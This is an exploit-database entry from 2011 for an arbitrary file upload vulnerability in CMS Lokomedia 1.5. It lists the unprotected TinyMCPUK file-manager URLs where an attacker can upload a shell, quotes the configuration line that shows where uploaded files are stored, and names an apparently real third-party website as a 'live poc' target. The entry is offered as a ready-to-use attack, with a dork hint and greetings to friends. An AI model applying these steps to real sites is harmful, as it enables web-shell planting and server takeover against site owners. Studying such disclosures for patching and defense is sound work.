CMS Lokomedia 1.5 Arbitary File Upload Vulnerability

2011-03-22T00:00:00
ID 1337DAY-ID-15658
Type zdt
Reporter eidelweiss
Modified 2011-03-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Software:   CMS Lokomedia
Vendor:     http://bukulokomedia.com/home
Vuln Type:  Arbitary file upload
Download link:  http://bukulokomedia.com/lokomedia-1.5.rar
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
DORK:   use your skill and play your imagination :P
 
Gratz:
- Kuris : status udah merit aja beib.. kgak undang² iks..
- Richie : RebelgiRL (Limited edition.. lol) live is never flate so enjoy this live mate ^_^
 
 
References: http://eidelweiss-advisories.blogspot.com/2011/03/cms-lokomedia-15-arbitary-file-upload.html
    
    
===================================================================
  
 
----------------------------------
  
    exploit & p0c
 
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html    // upload your file here
        or
[!] http://host/tinymcpuk/filemanager/browser.html
    or
[!] http://host//tinymcpuk/filemanager/frmupload.html
    or
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
  
    your shell or file will be placed here
  
/*------------------------------------------------------------------------------*/
/* Path to user files relative to the document root (no trailing slash)     */
/*------------------------------------------------------------------------------*/
$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ;          // <= here
/*==============================================================================*/
/* Apabila sudah di-onlinekan, ubah baris 47 dengan settingan seperti berikut:
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */             // <= or here
 
----------------------------------
 
    live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html



#  0day.today [2018-02-09]  #